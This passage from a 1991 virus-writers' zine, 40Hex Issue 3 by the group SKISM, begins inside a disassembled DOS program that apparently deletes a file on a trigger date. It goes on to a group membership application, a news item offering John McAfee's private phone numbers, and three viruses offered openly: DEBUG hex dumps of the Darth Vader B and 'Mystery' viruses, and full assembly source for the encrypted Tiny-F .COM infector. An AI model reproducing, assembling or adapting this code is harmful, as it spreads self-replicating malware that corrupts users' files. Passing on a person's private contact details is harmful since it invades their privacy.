db 0Dh, 0Ah, 'This program requires '
db 'DOS 3.00 or greater'
db 7, 0Dh, 0Ah, 0, 5Ch, 2Ah
db 2Eh, 2Ah, 0
db 0Dh, 0Ah, 'Access denied'
db 7, 0Dh, 0Ah, 0, 42h, 23h
db 0
db 305 dup (0)
loc_97:
push ax
push bx
mov ax,word ptr ds:[101h]
add ax,103h
shr ax,1
shr ax,1
shr ax,1
shr ax,1
mov bx,ax
mov ax,cs
add ax,bx
push ax
mov ax,267h
push ax
retf
db 5Bh, 58h, 2Eh, 0C6h, 6, 1Ah
db 0, 0FFh, 2Eh, 8Ch, 6, 17h
db 1, 2Eh, 0A3h, 19h, 1, 2Eh
db 89h, 26h, 1Bh, 1, 2Eh, 8Ch
db 16h, 1Dh, 1, 8Ch, 0C8h, 8Eh
db 0D0h, 0BCh, 4Bh, 2, 2Eh, 0A1h
db 19h, 1, 50h, 53h, 51h, 52h
db 56h, 57h, 55h, 1Eh, 6, 8Ch
db 0C8h, 8Eh, 0D8h, 8Eh, 0C0h, 0A0h
db 1Bh, 0, 3Ch, 50h, 75h, 6
db 0E8h, 6Ch, 0, 0EBh, 15h, 90h
db 3Ch, 44h, 75h, 6, 0E8h, 7Ah
db 0, 0EBh, 0Bh, 90h
loc_98:
cmp al,4Ch
jne loc_99
call sub_49
jmp short loc_100
loc_99:
stc
loc_100:
jc loc_103
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
cmp byte ptr cs:data_7e,0
je loc_101
mov ax,cs:data_4e
mov ds:data_1e,ax
mov ax,cs:data_5e
mov ds:data_2e,ax
mov ax,100h
mov cs:data_4e,ax
mov cs:data_5e,ds
jmp short loc_102
loc_101:
mov ax,cs
sub ax,cs:data_6e
add cs:data_5e,ax
loc_102:
pop ax
mov ss,word ptr cs:[11Dh]
mov sp,word ptr cs:[11Bh]
jmp dword ptr cs:data_4e
loc_103:
mov dx,104h
call sub_52
mov ax,4CFFh
int 21h
db 0BAh, 0AEh, 0, 0E8h, 0B6h, 0
db 0C6h, 6, 58h, 0, 29h, 0BAh
db 58h, 0, 0E8h, 79h, 0, 0E8h
db 0C2h, 0, 0E8h, 8Ch, 0, 0C3h
sub_48 proc near
mov ah,2Ah
int 21h
cmp cx,ds:data_8e
jb loc_106
cmp dh,ds:data_9e
jb loc_106
cmp dl,ds:data_10e
jb loc_106
mov ah,30h
int 21h
cmp al,3
jae loc_104
mov dx,0D0h
call sub_52
clc
jmp short loc_106
db 90h
loc_104:
push ds
push es
xor al,al
mov cx,8000h
mov es,word ptr cs:copyright+1
mov es,es:data_3e
xor di,di
loc_105:
repne scasb
scasb
jnz loc_105
add di,2
push es
pop ds
mov dx,di
mov ah,41h
int 21h
clc
pop es
pop ds
loc_106:
cmc
retn
sub_48 endp
sub_49 proc near
mov ah,1Ah
mov dx,83h
int 21h
mov ah,4Eh
mov cx,8
mov dx,0FFh
int 21h
mov si,0A1h
mov di,4Bh
cld
loc_107:
lodsb
scasb
stc
jnz loc_ret_108
or al,al
jnz loc_107
loc_ret_108:
retn
sub_49 endp
sub_50 proc near
push ax
push bx
push cx
mov ah,0Ah
int 21h
mov bx,dx
inc bx
mov cl,[bx]
xor ch,ch
jcxz loc_110
locloop_109:
inc bx
not byte ptr [bx]
loop locloop_109
loc_110:
pop cx
pop bx
pop ax
retn
sub_50 endp
sub_51 proc near
push cx
push si
push di
mov cl,ds:data_11e
xor ch,ch
mov si,59h
mov di,1Dh
cld
repe cmpsb
jz loc_111
stc
loc_111:
pop di
pop si
pop cx
retn
sub_51 endp
sub_52 proc near
push bx
push dx
mov bx,dx
loc_112:
mov dl,[bx]
or dl,dl
jz loc_113
call sub_53
inc bx
jmp short loc_112
loc_113:
pop dx
pop bx
retn
sub_52 endp
sub_53 proc near
push ax
mov ah,2
int 21h
pop ax
retn
sub_53 endp
sub_54 proc near
push dx
mov dl,0Dh
call sub_53
mov dl,0Ah
call sub_53
pop dx
retn
sub_54 endp
db 0F0h, 0FDh, 0C5h, 0AAh, 0FFh, 0F0h
db 8Dh, 6Dh, 0B2h
db 73h
seg_a ends
end start
-------------------------------------------------------------------------------
40Hex Issue 3 0005
Application For Membership To SKISM
SKISM is quickly becoming one of the largest virus creators/
distributers in America. Part of getting bigger is branching
out in new directions and getting more members.
If you wish to apply for membership to SKISM or if you want
your board to become to become a SKISM distribution site
fill out the application below and upload it to one of the
SKISM home bases listed in file one of this archive.
Keep in mind, from the start of the group SKISM we have been
virus authors, not trojan, bomb, or any other such distructive
mechanism. The entire purpose of SKISM is virus reserch, to
better understand the situation today with computer viruses.
Therefore trojan and bomb authors shall apply elsewere, when
you brush up your work, come back. No disrespect intended.
------------------------------------------------------------------------------
Application For Membership
I am interested in becoming
___ A SKISM Member
___ A SKISM Distribution Site Sysop
Handle: ________________
Aliases: ________________
First Name: ________________ (Used only for verification)
Have you ever written a computer virus(es)? ___
If yes name it/them: _______________________________________
_______________________________________
Programming Languages you know: ____________________________ Know Well
____________________________ :
____________________________ :
____________________________ Hardly Know
Are you a sysop of a BBS? ___
If yes leave the vitals:
BBS Name: _________________________
Dialup: _________________________
State: _________________________
Running: example: Telegard._______
Are you in any way connected to and law enforcment agency? ___
Do you realize that being untruthfull to the above question
waviers all legal matters: ____
Are you in anyway connected to any software company? ___
List three people you know (handles) : _________________
_________________
_________________
List three BBS that you have elite access to:
Name: _____________________ Dialup: _______________________
Name: _____________________ Dialup: _______________________
Name: _____________________ Dialup: _______________________
Thank you.
Please upload this applcation to one of the SKISM distribution site
mentioned in the first file of this archive.
-------------------------------------------------------------------------------
40Hex Issue 3 0006
Virus News
10/91
-----
Well the virus world is going as good as ever, dispite the over 20
virus scanners/removers out there.
The October 28th issue of PC-Magazine did a huge artical on the newest
virus scanner/defense systems. Mentioned in the artical were SKISM-1
and Captian Trips.
There is a new catagory of viruses out there, DIR-2 viruses. Havent
located one as of yet, but hope to in the near future.
Bogus SCANS continue to surface in the public domain. As if SCAN 82
was not played with enough, there have been many reports of bogus
versions SCAN 84. Most of which contian trojan bombs and will distroy
the FAT table or boot sector of you hard disk upon execution.
I have the unreleased phone numbers of John Mcafee. Including his
private office, home, and fax numbers. Get a hold of me somehow and I
will get them to you.
Theres a bogus version of the Red Cross virus going around on h/p
boards. The first command is to terminate the program. Things people
do for credit these days.
In case you haven't yet heard Patti Hoffmans VSUM, virus information
summary is now a giant hyper-text database. It's really a good
program, check it out. Can't wait to see a bogus version of that
going around.
That's it for no - till later.
40Hex Issue 3 0007
The Darth Vader Virus Strain B
The Darth Vader virus is pretty cool because it is a little
differnt than most other viruses. Instead of going resident
and infecting all programs run, it infects the stack space
of all .COM files, as they are copied. Pretty cool, huh?
This virus only infects .COM files with a stack space equal
to its own size.
It's orgin is Bulgeria, hmmm, has Bulgeria become the virus
captial of the world all of a sudden???
Well here it is, enjoy.
------------------------------------------------------------------------------
n darth-2.com
e 0100 E8 00 00 5E 83 EE 03 89 36 F0 00 A3 FE 00 31 C0
e 0110 8E D8 8E 06 AE 00 B8 00 90 8E D8 31 FF 47 81 FF
e 0120 00 0F 77 58 57 31 F6 B9 58 01 F3 A6 5F E3 02 EB
e 0130 EC 2E 8B 36 F0 00 2E 89 3E F2 00 0E 1F B9 58 01
e 0140 F3 A4 06 1F 8B F7 46 74 33 56 AD 93 AC 81 FB 36
e 0150 FF 74 03 5E EB F0 3C 16 75 F9 5E 56 2E 8B 3E F2
e 0160 00 89 3E 04 00 81 C7 41 01 A5 A5 A4 5F B0 9A AA
e 0170 B8 95 00 2E 03 06 F2 00 AB 8C C0 AB 0E 0E 1F 07
e 0180 BF 00 01 57 8B 36 F0 00 81 C6 47 01 A5 A4 A1 FE
e 0190 00 C3 E9 9C 00 2E 8C 1E 0A 00 2E 89 16 0C 00 2E
e 01A0 89 0E 0E 00 50 53 51 06 56 57 80 FC 40 75 E3 81
e 01B0 F9 68 01 72 DD B8 20 12 CD 2F 26 8A 1D B8 16 12
e 01C0 CD 2F 83 C7 28 0E 1F BE 4A 01 03 36 04 00 B9 03
e 01D0 00 F3 A6 75 5C 1E 07 2E 8E 1E 0A 00 2E 8B 36 0C
e 01E0 00 BF 47 01 2E 03 3E 04 00 A5 A4 B8 00 90 8E C0
e 01F0 2E 8B 0E 0E 00 31 FF 46 49 74 36 51 56 B9 58 01
e 0200 F3 A6 5E E3 03 59 EB ED 59 56 1E 2E 8E 06 0A 00
e 0210 2E 8B 3E 0C 00 B0 E9 AA 2E 2B 36 0C 00 83 EE 03
e 0220 8B C6 AB 07 5F 0E 1F 2E 8B 36 04 00 B9 58 01 F3
e 0230 A4 5F 5E 07 59 5B 58 2E 8B 16 0C 00 2E 8E 1E 0A
e 0240 00 00 00 00 00 00 CB CD 20 90 43 4F 4D 44 61 72
e 0250 74 68 20 56 61 64 65 72 90 1A 1A 1A 1A 1A 1A 1A
rcx
159
w
q
-------------------------------------------------------------------------------
40Hex Issue 3 0008
Mystery Virus
Actually I do know what this virus is, but being Halloween time
and all I thought I'd let you find out for yourself.
-------------------------------------------------------------------------------
n mystery.com
e 0100 E9 4B 00 CD 21 2E 56 53 2E 00 8C C3 83 C3 10 2E
e 0110 03 9C 3C 07 2E 89 9C 32 00 2E 8B 9C 3A 07 2E 89
e 0120 9C 30 00 8C C3 83 C3 10 2E 03 9C 40 07 8E D3 2E
e 0130 8B A4 3E 07 EA 00 00 00 00 BF 00 01 81 C6 42 07
e 0140 A4 A5 8B 26 06 00 33 DB 53 FF 64 F5 00 07 E8 00
e 0150 00 5E 83 EE 4C FC 2E 81 BC 42 07 4D 5A 74 0E FA
e 0160 8B E6 81 C4 FC 08 FB 3B 26 06 00 73 CC 2E C6 84
e 0170 76 00 C5 50 06 56 1E 0E 1F B8 00 C5 CD 21 3D 31
e 0180 67 75 04 07 E9 AB 00 07 B4 49 CD 21 BB FF FF B4
e 0190 48 CD 21 81 EB E8 00 73 03 E9 96 00 8C C1 F9 13
e 01A0 CB B4 4A CD 21 BB E7 00 F9 26 19 1E 02 00 06 8E
e 01B0 C1 B4 4A CD 21 8C C0 48 8E D8 C7 06 01 00 08 00
e 01C0 E8 E1 05 8B D8 8B CA 1F 8C D8 E8 D7 05 03 06 06
e 01D0 00 83 D2 00 2B C3 1B D1 72 04 29 06 06 00 1E 0E
e 01E0 2E C6 84 F5 00 62 33 FF 8E DF 1F B9 95 07 90 F3
e 01F0 A4 26 C7 06 49 07 00 00 B8 00 62 CD 21 8E DB 8B
e 0200 3E 08 00 8B DF 8B 3E 06 00 47 8E DB 8B 5D 02 8B
e 0210 3D 83 C7 1A 26 89 1E 93 07 8C C1 8E C3 FA B8 EA
e 0220 00 AA B8 38 03 AB 8B C1 AB 8E C1 26 89 3E 91 07
e 0230 FB 07 B8 00 2A CD 21 3A D6 74 14 E9 8D 00 69 62
e 0240 6D 40 40 53 4E 53 20 20 20 20 20 20 20 20 20 0E
e 0250 1F 5E 56 2E C6 84 68 01 CD B0 02 B9 01 00 33 D2
e 0260 2E C6 84 69 01 25 8B DE 81 C3 26 03 56 2D 4C 5A
e 0270 5E 72 58 06 1E 07 2E C6 84 B1 01 26 2E C6 84 B0
e 0280 01 CD 8B FB 81 C7 F3 01 56 8B F3 83 C6 0B B9 09
e 0290 00 83 3C 00 74 16 F3 A4 5E 8B FB 83 C7 03 56 81
e 02A0 C6 39 01 B9 11 00 AC 2C 20 AA E2 FA 5E 56 33 D2
e 02B0 B0 02 B9 01 00 0C 1B 58 5E 07 72 0F 0E 1F 58 1F
e 02C0 B8 03 C5 CD 21 58 B8 00 4C CD 21 5E 07 58 06 1F
e 02D0 2E 81 BC 42 07 4D 5A 75 03 E9 2E FE E9 5A FE 50
e 02E0 53 51 52 56 57 06 1E 0E 1F 80 3E 39 07 01 75 2A
e 02F0 B8 03 00 CD 10 C6 06 35 07 09 C6 06 38 07 00 C6
e 0300 06 36 07 00 C6 06 37 07 00 C6 06 33 07 00 C6 06
e 0310 39 07 00 90 C7 06 31 07 D2 06 80 3E 33 07 01 75
e 0320 03 E9 D5 00 80 3E 30 07 00 74 07 FE 0E 30 07 E9
e 0330 C7 00 8B 1E 31 07 83 3F FF 75 13 E4 61 24 FC E6
e 0340 61 C6 06 34 07 00 C6 06 33 07 01 E9 AB 00 80 3E
e 0350 34 07 01 75 03 E9 92 00 B0 B6 E6 43 8A 47 02 A2
e 0360 30 07 C6 06 34 07 01 8B 1F B8 DD 34 BA 12 00 F7
e 0370 F3 E6 42 8A C4 E6 42 E4 61 0C 03 E6 61 83 06 31
e 0380 07 03 8A 36 37 07 8D 36 A5 06 B9 03 00 80 3E 35
e 0390 07 0F 7E 09 C6 06 35 07 09 90 EB 0E 90 80 3E 35
e 03A0 07 09 73 06 C6 06 35 07 0F 90 8A 1E 35 07 8A 16
e 03B0 36 07 E8 4D 00 FE C6 E2 F1 80 06 36 07 02 80 3E
e 03C0 38 07 01 74 19 80 3E 37 07 15 77 0C 80 06 37 07
e 03D0 02 FE 06 35 07 EB 22 90 C6 06 38 07 01 90 80 2E
e 03E0 37 07 02 FE 0E 35 07 EB 10 90 8A 07 A2 30 07 C6
e 03F0 06 34 07 00 83 06 31 07 01 1F 07 5F 5E 5A 59 5B
e 0400 58 CF 51 B7 00 B4 02 CD 10 B9 01 00 AC 0A C0 74
e 0410 18 2C 20 3C DF 74 04 3C DC 75 06 B9 22 00 80 C2
e 0420 21 B4 09 CD 10 FE C2 EB DC 59 C3 B0 03 CF E8 39
e 0430 01 E8 49 03 9D 80 FC 68 2E FF 2E 91 07 55 8B EC
e 0440 FF 76 06 9D 5D 9C FC 3D 00 4B 74 E2 80 FC 3C 74
e 0450 0A 80 FC 3E 74 4A 80 FC 5B 75 6F 2E 83 3E 49 07
e 0460 00 74 03 E9 A6 00 E8 B9 00 74 03 E9 9E 00 E8 0C
e 0470 03 9D E8 EB 00 73 03 E9 99 00 9C 06 0E 07 56 57
e 0480 51 50 BF 49 07 AB 8B F2 B9 41 00 AC AA 84 C0 74
e 0490 07 E2 F8 26 89 0E 49 07 58 59 5F 5E 07 9D 73 73
e 04A0 2E 3B 1E 49 07 75 65 85 DB 74 61 E8 CF 02 9D E8
e 04B0 AE 00 72 5F 9C 1E 0E 1F 52 BA 4B 07 E8 AB 00 2E
e 04C0 C7 06 49 07 00 00 5A 1F EB D3 80 FC 3D 74 35 80
e 04D0 FC 43 74 30 80 FC 56 74 2B 80 FC C5 75 2E 3C 03
e 04E0 74 06 B8 31 67 EB 37 90 1E B8 00 00 8E D8 FA C7
e 04F0 06 70 00 DA 01 8C 0E 72 00 FB 1F 2E C6 06 39 07
e 0500 01 EB 1B 90 E8 1B 00 75 03 E8 5E 00 E8 6E 02 9D
e 0510 E8 4D 00 9C 1E E8 70 02 C6 06 00 00 5A 1F 9D CA
e 0520 02 00 50 56 8B F2 AC 84 C0 74 24 3C 2E 75 F7 E8
e 0530 22 00 8A E0 E8 1D 00 3D 6F 63 74 0C 3D 78 65 75
e 0540 10 E8 10 00 3C 65 EB 09 E8 09 00 3C 6D EB 02 FE
e 0550 C0 5E 58 C3 AC 3C 43 72 06 3C 59 73 02 04 20 C3
e 0560 9C 80 FC 68 2E FF 1E 91 07 C3 1E 06 56 57 50 53
e 0570 51 52 8C DE 33 C0 8E D8 C4 06 90 00 06 50 C7 06
e 0580 90 00 26 03 8C 0E 92 00 8E DE 33 C9 B8 00 43 E8
e 0590 CE FF 8B D9 80 E1 FE 3A CB 74 07 B8 01 43 E8 BF
e 05A0 FF F9 9C 1E 52 53 B8 02 3D E8 B4 FF 72 0A 8B D8
e 05B0 E8 26 00 B4 3E E8 A8 FF 59 5A 1F 9D 73 06 B8 01
e 05C0 43 E8 9C FF 33 C0 8E D8 8F 06 90 00 8F 06 92 00
e 05D0 5A 59 5B 58 5F 5E 07 1F C3 0E 1F 0E 07 BA 95 07
e 05E0 B9 18 00 B4 3F E8 78 FF 33 C9 33 D2 B8 02 42 E8
e 05F0 6E FF 89 16 AF 07 3D 00 0B 83 DA 00 72 6C A3 AD
e 0600 07 81 3E 95 07 4D 5A 75 17 A1 9D 07 03 06 AB 07
e 0610 E8 91 01 03 06 A9 07 83 D2 00 8B CA 8B D0 EB 15
e 0620 80 3E 95 07 E9 75 44 8B 16 96 07 81 C2 03 01 72
e 0630 3A FE CE 33 C9 B8 00 42 E8 25 FF 05 00 07 90 83
e 0640 D2 00 3B 06 AD 07 75 23 3B 16 AF 07 75 1D BA B1
e 0650 07 8B F2 B9 EF 02 B4 3F E8 05 FF 72 0E 3B C8 75
e 0660 0A BF 49 00 AC AE 75 03 E2 FA C3 33 C9 33 D2 B8
e 0670 02 42 E8 EB FE A3 45 07 89 16 47 07 81 3E 95 07
e 0680 4D 5A 74 0A 05 95 09 90 83 D2 00 74 19 C3 8B 16
e 0690 AD 07 F6 DA 83 E2 0F 33 C9 B8 01 42 E8 C1 FE A3
e 06A0 AD 07 89 16 AF 07 B8 00 57 E8 B4 FE 9C 51 52 81
e 06B0 3E 95 07 4D 5A 74 05 B8 00 01 EB 07 A1 A9 07 8B
e 06C0 16 AB 07 2E C7 06 47 00 00 07 BF 3A 07 AB 8B C2
e 06D0 AB A1 A5 07 AB A1 A3 07 AB BE 95 07 A4 A5 33 D2
e 06E0 B9 49 07 90 B4 40 E8 77 FE 72 27 33 C8 75 23 8B
e 06F0 D1 B8 00 42 E8 69 FE 81 3E 95 07 4D 5A 74 15 C6
e 0700 06 95 07 E9 A1 AD 07 05 46 00 A3 96 07 B9 03 00
e 0710 EB 57 EB 5D E8 8A 00 F7 D0 F7 D2 40 75 01 42 03
e 0720 06 AD 07 13 16 AF 07 B9 10 00 F7 F1 C7 06 A9 07
e 0730 49 00 A3 AB 07 05 72 00 A3 A3 07 C7 06 A5 07 00
e 0740 01 81 06 AD 07 49 07 83 16 AF 07 00 A1 AD 07 25
e 0750 FF 01 A3 97 07 9C A1 AE 07 D0 2E B0 07 D1 D8 9D
e 0760 74 01 40 A3 99 07 B9 18 00 BA 95 07 B4 40 E8 EF
e 0770 FD 5A 59 9D 72 06 B8 01 57 E8 E4 FD C3 1E E8 07
e 0780 00 C6 06 00 00 4D 1F C3 50 53 B4 62 E8 D1 FD 8C
e 0790 C8 48 4B 8E DB F9 13 1E 03 00 3B D8 72 F5 5B 58
e 07A0 C3 A1 9D 07 BA 10 00 F7 E2 C3 FE FF FD 00 FE 40
e 07B0 75 73 73 72 40 40 40 40 40 76 89 92 95 73 8F 86
e 07C0 94 40 40 48 83 49 40 40 96 51 4E 40 51 59 59 50
e 07D0 40 FD 00 FE FC FD 00 4A 01 03 01 B8 01 0B 01 4A
e 07E0 01 06 01 72 01 01 02 9F 01 09 01 15 01 02 02 15
e 07F0 01 03 02 72 01 08 01 4A 01 05 02 26 01 01 01 4A
e 0800 01 08 02 15 01 03 02 15 01 03 03 26 01 08 02 26
e 0810 01 05 01 4A 01 01 02 72 01 08 01 72 01 04 01 72
e 0820 01 04 00 72 01 08 02 9F 01 06 02 B8 01 01 02 EE
e 0830 01 0F FF FF FF 00 00 00 01 00 00 00 00 00 00 00
e 0840 01 3A 16 D8 8E C3 8E B8 00 4C 05 00 00 00 1A 1A
rcx
74e
w
q
-------------------------------------------------------------------------------
40Hex Issue 3 0009
The Tiny-F Virus
In our first issue we gave you the source for the Tiny-B virus.
Well some people don't quit.
After months of struggling Psyco-genius decided to give
his attempts to make this a good virus over to someone who
knows what he's doning.
So Dark (mastered assembler in one week) Angel did some mods
and here we have it.
-------------------------------------------------------------------------------
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
ORG 100h
DOS EQU 21h
start: JMP pgstart
exlbl: db 0CDh, 20h, 7, 8, 9
pgstart:CALL tinyvir
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP, OFFSET exlbl
CALL endecrpt
JMP SHORT realprog
;-----------------------------------------------------------------------------
; nonencrypted subroutines start here
;-----------------------------------------------------------------------------
; PCM's encryption was stupid, mine is better - Dark Angel
endecrpt:
; Only need to save necessary registers - Dark Angel
PUSH AX ; store registers
PUSH BX
PUSH CX
PUSH SI
; New, better, more compact encryption engine
MOV BX, [SI+EN_VAL]
ADD SI, offset realprog
MOV CX, endenc - realprog
SHR CX, 1
JNC start_encryption
DEC SI
start_encryption:
MOV DI, SI
encloop:
LODSW ; DS:[SI] -> AX
XOR AX, BX
STOSW
LOOP encloop
POP SI ; restore registers
POP CX
POP BX
POP AX
RET
;-----end of encryption routine
nfect:
CALL endecrpt
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT DOS ; do it!
PUSHF
CALL endecrpt
POPF
JC outa1 ; error, bug out
RET
outa1:
JMP exit
;-----------------------------------------------------------------------------
; Unencrypted routines end here
;-----------------------------------------------------------------------------
realprog:
CLD ; forward direction for string ops
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
; Instead, set DTA to SI+ENDPROG+131h
MOV AH, 1Ah ; Set DTA
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
INT 21h
LEA DX,[SI+fspec] ; get filespec (*.COM)
XOR CX, CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT DOS ; ----\/----
JC hiccup ; no more files found, terminate virus
; Next part had to be changed to account for new DTA address - Dark Angel
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
; (offset 30 is DTA filename start)
MOV AX,3D02H ; open file
INT DOS ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer
MOV CX,0003H ; read 3 bytes
INT DOS ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP exit
infect:
MOV AX,5700h ; get date function
INT DOS ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
; Tighter Code here - Dark Angel
XOR CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT DOS ; do it!
MOV DX,DI ; set dest index to area for buffer
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT DOS ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
getaval: ; encryption routine starts here
; My modifications here - Dark Angel
MOV AH, 2Ch ; DOS get TIME function
INT DOS ; do it!
OR DX, DX ; Is it 0?
JE getaval ; yeah, try again
MOV word ptr [si+offset en_val], DX ; Store it
; Tighter code here - Dark Angel
XOR DX,DX ; clear regs
XOR CX,CX ; " "
MOV AX,4202H ; move file pointer
INT DOS ; do it!
OR DX,DX ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
CALL nfect
MOV AX,4200H ; move pointer
XOR CX, CX ; clear reg
MOV DX,OFFSET 00001 ; where to set pointer
INT DOS ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
MOV CX,0002H ; two bytes (the JMP)
INT DOS ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT DOS ; do it!
exit:
MOV AH,3EH ; close file
INT DOS ; do it!
; Return DTA to old position - Dark Angel
MOV AH, 1Ah ; Set DTA
MOV DX, 80h ; to PSP DTA
INT 21h
JMP BP
;-----------------------------------------------------------------------------
; encrypted data goes here
;-----------------------------------------------------------------------------
fspec LABEL WORD
DB '*.COM',0
nondata DB 'Tiny-F version 1.1' ; Program identification
DB '???@&?????' ; author identification
DB 'Released 10-19-91' ; release date
endenc LABEL BYTE ; end of encryption zone
;-----------------------------------------------------------------------------
; nonencrypted data goes anywhere after here
;-----------------------------------------------------------------------------
blnkdat LABEL WORD
DW 0000H
; Only en_val is needed now because of new encryption mechanism
en_val DW 0h
endprog LABEL WORD
tinyv ENDS
END start
-------------------------------------------------------------------------------
40Hex Issue 3 0010
In Closing
Well that will do it for this issue. Sorry it took so damn long,
but screw it.
Next issue we will have more articals, more viruses, and all that.
We were supposed to have an interview with an Amiga virus writer
this issue but we just couldn't get it in time. Also we were
planning an interview with John Mcafee, but the same story there.
Also next issue, I hope to have the Bob Ross virus, from the
twisted mind of Dark Angel. And If I can find it, the DIR-2 virus
and The Teqeulla Virus, so I can't spell.
See you then.